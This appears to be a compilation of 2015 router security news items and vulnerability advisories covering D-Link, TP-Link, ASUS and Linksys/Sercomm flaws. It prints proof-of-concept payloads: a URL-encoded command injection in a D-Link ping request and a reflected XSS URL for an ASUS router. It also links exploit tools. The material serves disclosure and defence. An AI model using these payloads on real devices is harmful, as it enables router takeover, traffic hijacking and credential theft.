Amnesia strikes as hacker discloses remote code exec flaws Domestic router Daddy D-Link is patching dangerous remote access flaws in several models of its networking gear. The patches follow a round of zero-day disclosures by Canadian researcher Peter Adkins early this week, after D-Link allegedly cut communication while he quietly disclosed the flaws. The most severe flaw allowed attackers to hijack the devices including changing DNS settings by creating malicious sites which exploit cross-site request forgeries. D-Link issued an advisory in which it warns DIR models 626L; 636L; 808L; 810L; 820L; 826L; 830, and 836L are open to remote code execution. D-Link says attackers can upload and run files without authentication from the LAN-side of the device or over the internet if the "external connections" box was taken off default and ticked. "A second vulnerability reportedly relates to the device’s ping utility that might permit command injection without authentication," the company says of Adkin's work. "A third vulnerability reportedly may exploit certain chipset utilities in firmware to potentially permit a malicious user an attack disclosing information about the devices configuration." Adkins told El Reg ,many of the security failings in home routers could be put down to expansive feature sets. "The platforms the devices are build upon may be solid - such as OpenWRT - but then additional services are 'bolted in' to provide value-add, and that security seems to go straight out of the window," Adkin says. Other routers may be affected due to the location of ncc and ncc2 binaries Fellow router hackers Stefan Viehböck and Jeremy Richards found further flaws in five TRENDnet offerings since patched, plus another D-Link mess. Adkins reports contact between D-Link and himself ceased around February 23 when D-Link, after confirming receipt of the vulnerability reports on 11 January, said they had no knowledge of the holes and directed him to the company security reporting guide. The company recommends users run encrypted wireless to prevent the low chance that passing hackers would break into the networks. Only the DIR-820L was patched. Source

############################################################################# # # SWISSCOM CSIRT SECURITY ADVISORY - http://www.swisscom.com/security # ############################################################################# # # CVE ID: CVE-2015-1187 # Product: D-Link DIR636L # Vendor: D-Link # Subject: Remote Command Injection - Incorrect Authentication # Effect: Remotely exploitable # Author: Tiago Caetano Henriques, tiago.caetanohenriques AT swisscom.com # Stephan Rickauer, Swisscom CSIRT (csirt AT wisscom.com) # Date: March 2nd 2015 # ############################################################################# Introduction ------------ Tiago Caetano Henriques discovered a security flaw in D-link DIR-636L router that enables an attacker on the same network to execute arbitrary commands without being authenticated. Vulnerable ---------- D-Link DIR-636L and possibly other versions as seen on [1]. Patches ------- None existant at the moment. Description ----------- The D-Link DIR636L (possibly others) incorrectly filters input on the 'ping' tool which allows to inject arbitrary commands into the router. Secondly, authentication is not being performed correctly. This enables a remote attacker to gain full control of the router, for example to attack other networks in a DDoS style attack, or even expose computers behind these devices to the internet as you are able to change firewall/nat rules on this router. Attack vector ------------- A URL encoded POST request with the values in front of ping_addr= such as the following, will go through and will execute the command in front of &. POST /ping.ccp HTTP/1.1 Host: 192.168.0.1 ... X-Requested-With: XMLHttpRequest Referer: http://192.168.0.1/tools_vct.asp Content-Length: 64 Cookie: ccp_act=ping_v4&ping_addr=%31%39%32%2e%31%36%38%2e%30%2e%31%30%37%20%26%20%2f %62%69%6e%2f%70%69%6e%67%20%39%34%2e%32%33%2e%37%38%2e%32%33%31 Milestones ---------- Nov 30th 2014 Vulnerability discovered by Tiago Caetano Henriques Dec 18th 2014 Vulnerability reported to Swisscom CSIRT Jan 7th 2015 CVE ID requested at MITRE Jan 18th 2015 CVE ID 2015-1187 assigned by MITRE Feb 2th 2015 Vendor contact established and provided with technical details Feb 16th 2015 Vendor acknowledged issue and communicates time line for patches Feb 26th 2015 Full Disclosure by Peter Adkins Mar 2nd 2015 Forced Public Release of this Advisory due to the previous Full Disclosure at [1] References ---------- [1] https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2 Source/url]

Pharming attacks are generally network-based intrusions where the ultimate goal is to redirect a victim’s web traffic to a hacker-controlled webserver, generally through a malicious modification of DNS settings. Some of these attacks, however, are starting to move to the web and have their beginnings with a spam or phishing email. Researchers at Kaspersky Lab have been watching this trend for some time, reporting in September on a particular campaign in Brazil targeting home routers using a combination of drive-by downloads and social engineering to steal banking and other credentials to sensitive web-based services. Messaging security company Proofpoint yesterday reported on the latest iteration of this attack, also based in Brazil. The campaign was carried out during a five-week period starting in December when Proofpoint spotted phishing messages, fewer than 100, sent to customers of one of the country’s largest telecommunications companies, Oi, also known recently as Telemar Norte Leste S/A. Users were sent a phishing email warning them of a past-due account and providing them a link supposedly to a portal where they could resolve the issue. Instead, the websites host code that carries out a cross-site request forgery attack against vulnerabilities in home UTStarcom and TP-Link routers distributed by the telco. The pages contain iframes with JavaScript exploiting the CSRF vulnerabilities if present on the routers. They also try to brute force the admin page for the router using known default username-password combinations. Once the attackers have access to the router, they’re able to change the primary DNS setting to the attacker-controlled site, and the secondary setting to Google’s public DNS. “Setting a functioning DNS server as the secondary will allow DNS requests from clients in this network to resolve even if the malicious DNS becomes unavailable, reducing the chance that the user will notice an issue and contact their telecom’s Customer Support line for assistance, which could lead to the discovery and eventual removal of the compromise,” Proofpoint said in its advisory. Via this method, the attacker bypasses the need to own public DNS servers in order to redirect traffic, and have an easier path to man-in-the-middle attacks, which they can use to sniff traffic, in this case for banking credentials, or email. “It’s elegantly vicious,” said Kevin Epstein, vice president, advanced security and governance at Proofpoint. “It’s an attack that, based on the way it’s constructed, is almost invisible. There are no traces on the laptop other than the [phishing] email and unless you’re a security pro logged into the router and know what the DNS is supposed to be, you can look at it and not realize it’s been compromised.” The best defense is to change the router password, especially if it’s still the default provided by the ISP. The potential for trouble extends well beyond this small campaign in Brazil; any router secured with default credentials is susceptible to this attack and a plethora of others. Kaspersky researcher Fabio Assolini, who lives in Brazil, said he’s seeing an average of four new such attacks daily. “It’s not a limited pharming campaign; it’s massive,” he said. Router hacks have been a growing nuisance in the last 12 to 18 months, with more white hat researchers looking into the breadth and severity of the issue. Some cases, such as the Misfortune Cookie vulnerability in a popular embedded webserver called RomPager, have put 12 million devices, including home routers, at risk of attack. Last summer during DEF CON, a hacking contest called SOHOpelessly Broken focusing on router vulnerabilities, yielded 15 zero-day vulnerabilities that were reported to vendors and patched. While in this case, the attackers targeted banking credentials for online accounts, Proofpoint’s Epstein said he can see that scope expanding. “As far as motive, the [proof of concept exploits] we saw seem financially motivated, which is typical of most cybercrime, but the technique is generally applicable,” he said. “If you wanted to harvest a bunch of traffic for a DDOS attack or get into a company, this is a way to do it and gain complete man-in-the-middle control over the user.” Source

Router Hunter is a php script that scans for and exploits DNS change vulnerabilities in Shuttle Tech ADSL Modem-Router 915 WM and D-Link DSL-2740R routers and also exploits the credential disclosure vulnerability in LG DVR LE6016D devices. Download

##################################### Title:- Reflected XSS vulnarbility in Asus RT-N10 Plus router Author: Kaustubh G. Padwad Product: ASUS Router RT-N10 Plus Firmware: 2.1.1.1.70 Severity: Medium Auth: Requierd # Description: Vulnerable Parameter: flag= # Vulnerability Class: Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) # About Vulnerability: Asus Router RT-N10 Plus with firmware 2.1.1.70 is vulnarable for crosss site scripting attack,this may cause a huge network compemise. #Technical Details: The value of the flag request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload initial78846%27%3balert("Hacked_BY_S3curity_B3ast")%2f%2f372137b5d was submitted in the flag parameter. This input was echoed unmodified in the application's response. #Steps to Reproduce: (POC): After setting up router Enter this URL 1.http://ip-of-router/result_of_get_changed_status.asp?current_page=&sid_list=LANGUAGE%3B&action_mode=+App ly+&preferred_lang=&flag=initial78846%27%3balert(1337)%2f%2f372137b5d 2. this will ask for creadintial once creatintial enterd it will be successfull XSS # Disclosure: 8-jan-2015 Repoerted to ASUS 9-jan-2015 Asus confirm that they reported to concern department 15-jan-2015 Ask for update from asus asus says reported to HQ 28-jan-2015 Ask asus about reporting security foucus No reply from ASUS 29-jan-2015 security focus bugtraq #credits: Kaustubh Padwad Information Security Researcher kingkaustubh@me.com https://twitter.com/s3curityb3ast http://breakthesec.com https://www.linkedin.com/in/kaustubhpadwad Source

In a blog post, Eloi said that During Christmas Holidays he forgot the admin interface password of his Linksys WAG200G router and in an effort to gain access back of its administration panel, he first scanned the Router and found a suspicious open TCP port i.e. 32764. To do further research on this port service, he downloaded a copy Linksys firmware and reverse-engineered it. He found was a secret backdoor interface that allowed him to send commands to the router from a command-line shell without being authenticated as the administrator. Then he tried to Brute-force the login available at that port, but doing so flips the router's configuration back to factory settings with default router administration username and password. 'The backdoor requires that the attacker be on the local network, so this isn’t something that could be used to remotely attack DSL users. However, it could be used to commandeer a wireless access point and allow an attacker to get unfettered access to local network resources.' He described the complete details of this Serious vulnerability in above slides. After his post, other hackers around the world did further research, that shows that these devices are made by Sercomm, meaning that Cisco, Watchguard, Belkin and various others may be affected as well. Source: Hacking Wireless DSL routers via Administrative password Reset Vulnerability The Python based exploit script can be downloaded from here: https://github.com/elvanderb/TCP-32764 The Complete List of vulnerable devices can be found here: https://github.com/elvanderb/TCP-32764/blob/master/README.md